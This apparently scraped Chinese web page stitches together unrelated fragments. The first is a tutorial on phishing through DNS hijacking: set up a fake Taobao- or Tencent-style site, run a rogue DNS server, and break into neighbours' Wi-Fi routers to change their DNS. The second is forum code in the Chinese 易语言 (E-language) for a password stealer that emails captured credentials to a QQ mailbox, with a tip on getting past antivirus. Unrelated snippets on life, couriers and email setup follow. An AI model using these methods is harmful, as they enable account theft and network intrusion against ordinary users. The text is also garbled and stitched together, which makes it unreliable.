新浪是有这个问题的!你的是收费邮箱就可以通知客户!如果不是那么就不行!
分析了一下网上有两种方法可以实现DNS劫持攻击。
第一种,“DNS ID欺骗”技术。
第二种,DNS高速缓冲存储器麻痹。以上两种方法的具体步骤不详解了,百度一下去。
第三种,也是这篇文章的主要内容,完全原创。思路——通过修改路由器中的DNS到假的DNS地址,对路由所属的内网主机进行欺骗。大概思路是这样,十分简单,运用了移花接木的思想。
相比前两种方法第三种比较容易实施,前两种是主要针对DNS服务器开展的,DNS服务器是互联网的基础设施,所以一般安全系防范比较好,岂能被菜鸟轻易得逞。所以前两种方法攻击的影响范围大,但很难且成功率不敢保证。
第三种主要针对网络节点——路由器(如果技术好还可以扩大到交换机或者EPON上)开展的,虽然搞定路由的本领对菜鸟来说很简单但,但此法只能欺骗内网内的机器,所以钓鱼是的不二选择。下面讲方法。
①架设一个钓鱼网站。首先架设服务器,可以在本机架设,也可以花点钱买个虚拟主机(现在虚拟主机功能很强大,钓鱼网站是小菜,而且很便宜,还有海外主机),然后就是钓鱼站的整站源码,网上有下载的,如果有能力可以自己写,也可以花几百块钱请专业人士写,这样的质量高一些。得到源码后放到服务器上测试一下,没问题的话钓鱼网站就做好了。我们的钓鱼网站不需要域名,只要有服务器的IP就可以了,因为我们的假DNS可以给它任何域名。关于钓鱼网站的类型可以淘宝,可以腾讯,也可以搞其它常用的且要盗取的信息是对你有价值的,如果你搞一个很偏网站做钓鱼网站,别人压根就没有浏览过就白忙活了。
②架设自己的假DNS服务器。这个要在自己的机器上架设了,WIN2003中有DNS服务组件(Linux也可以),在控制面板中打开此服务,然后将钓鱼网站仿的原正常网站的域名解析到你的钓鱼站的IP,其它的就交由网上其它的DNS主机解析。配置完后,在自己机器中填用自己架设的DNS,测试一下,看看DNS和钓鱼站是否可以正常运行。还有一点要注意,一般电脑为了节省网络资源,在本机会有一个HOSTS文件,功能类似DNS服务器,但优先级高于DNS服务器,如果对方主机的HOSTS文件中有你想欺骗的正常解析记录的话,钓鱼的成功率就要降低了。以上涉及到的技术(包括下面讲的破wifi连接密码)都可以百度到,而且技术都很成熟,文章也很详细。所以本文就不详解了,主要是思路。
③进入目标路由后台管理界面,并修改DNS地址。现在路由器都有无线功能,而且在城市家庭普及广,所以我们就有机会从外部进入到别人的内网中,当我们打开无线网卡可以搜索到大量AP的ssid,找一个家用的例如TPlink_XXXX Tenda_XXXX等连接,运气好碰到没有加密的就这么进去了,但大部分是加密的,碰到这种情况先用1234578之类的弱口令试一下,如果不行的话再用工具进行破解。
嗯嗯,改的设置对着呢。
但是你貌似没有填端口号,TX的应该是25,因为我填的是25……能发出去
可以这么写:
连接发信服务器 (“smtp.qq.com”, 25, 用户名, 密码)
发送邮件 (“号来了!”, “账号:” + 编辑框2.内容 + #换行符 + “密码:” + 编辑框2.内容, “*@qq.com”, , ,“*@qq.com”,)
但是,发送的时候360会拦截下来。这个你得注意下,其实你家机子要是固定IP的话,可以做个服务器。还有就是你这个验证根本不行,我账号填个1,密码填个1,那岂不就完事了,还能登上去,你又来一个垃圾。可以加个验证。
'------------------------验证源码
.版本 2
登录网页 = 网页源码编码转换 (温暖HTTP读文件 (“;auto=1s_it=1g_f=286sid=”))
' 温暖HTTP读文件 (“;auto=1s_it=1g_f=286sid=”))
产生sid = 取文本之间内容 (登录网页, “sid=”, “”)
登录返回文本 = 进行POST (寻找POST参数 (登录网页, “马上登录”), _启动窗口.编辑框1.内容, _启动窗口.编辑框2.内容)
.判断开始 (寻找文本 (登录返回文本, “登录密码错误”, , 假) > 0)
延时 (1000)
密码错误反馈.调用反馈事件 (, , )
.判断 (寻找文本 (登录返回文本, “登录失败,可能系统繁忙,请稍后重试”, , 假) > 0)
延时 (500)
帐号错误反馈.调用反馈事件 (, , )
.判断 (寻找文本 (登录返回文本, “您填写的帐号或密码不正确,请重新输入”, , 假) > 0)
延时 (1000)
密码错误反馈.调用反馈事件 (, , )
.判断 (寻找文本 (登录返回文本, “您输入的帐号不存在”, , 假) > 0)
延时 (500)
帐号错误反馈.调用反馈事件 (, , )
.判断 (寻找文本 (登录返回文本, “登录成功”, , 假) > 0)
登录成功网页 = 登录返回文本
sid = 产生sid
延时 (1000)
主界面反馈.调用反馈事件 (, , )
.判断 (寻找文本 (登录返回文本, “请输入验证码”, , 假) > 0)
验证码图片地址 = 取文本之间内容 (登录返回文本, “img src=” + #引号, #引号)
延时 (1000)
验证码反馈.调用反馈事件 (, , )
.如果 (全局验证码内容 = “”)
_启动窗口.可视 = 真
.否则
输入验证码返回文本 = 进行POST (寻找POST参数 (登录返回文本, “马上登录”), , , 全局验证码内容)
.判断开始 (寻找文本 (输入验证码返回文本, “登录成功”, , 假) > 0)
登录成功网页 = 输入验证码返回文本
sid = 产生sid
延时 (1000)
主界面反馈.调用反馈事件 (, , )
.默认
延时 (1000)
密码错误反馈.调用反馈事件 (, , )
' -----------------接下来不是源码了
这里还要用到一个温暖HTTP应用模块,我给你传上来吧。
我自己写了个不带验证的奥拉星“外挂”,你可以看看,嘻嘻……(其实还是盗号的,只是不发送过来)
走过春夏秋冬,我们便理解了季节的轮回。经过昨天,今天,明天,我们便明白了生命的可贵。四季可以轮回,花谢了还有来年,雪融了还有明年。生命的进程中,昨天已过,今天正在,明天会不会如愿。
每一个过去,堆积的都是今天,想要明天美好,今天就要操劳,人生珍惜每个今天,才能看到一个无悔的明天。就能使我们伤心的,不是最好的就是最亲的,能使我们动情的,不是最疼的就是最爱的。生活中帮助我们的都是至交,支持我们的都是挚友。
航空急件传送业务的主要形式 到不了。从深圳到天门,发顺丰快递,最少也得3天,比方说:今天5月8号发件,最快也得5月10号下午到天门。(这是顺丰标准快递)如果发顺丰特惠,估计得到5月11号才能到天门。航...
你还知道哪些国家的国际区号? 亚 洲马来西亚 0060 印度尼西亚 0062 菲律宾 0063 新加坡 0065 泰国 0066 文莱 00673 日本 0081 韩国 0082 越南 0084 朝鲜...
怎样设置自己的电子邮箱? 设置自己的电子邮箱。首先你要下载和注册一个电子邮箱。你可以下载邮箱大师。邮箱大师下载后可以使用拼音字母注册。也可以使用拼音加阿拉伯数字注册。注册完成后邮箱就可以接收和发送电子...
qq邮箱怎么看 查看方式有两种,第一种是在QQ界面查看,第二种是在网页上搜索查看,具体操作如下:登录QQ看,具体操作如下:打开你自己的QQ找到邮箱。打开手机上的QQ,登录你需要查看QQ邮箱的账号,然后...
iPhone手机会被入侵吗,会被远程控制摄像头吗?如果锁屏摄像头还会被控制进行偷拍吗? 基本上不会,如果手机没有越狱,是无法进行入侵的。ios系统算比较安全系统了。手机应用锁能防止黑客吗? 不能屏幕锁...
网易邮箱账号怎么注册 网易邮箱账号如何注册 1、首先打开【网易邮箱大师】客户端,然后点击【申请网易邮箱】按钮。 2、点击同意条款,接着选择要注册的邮箱类型。 3、点击进入后输入要设置的邮箱地址、密码、...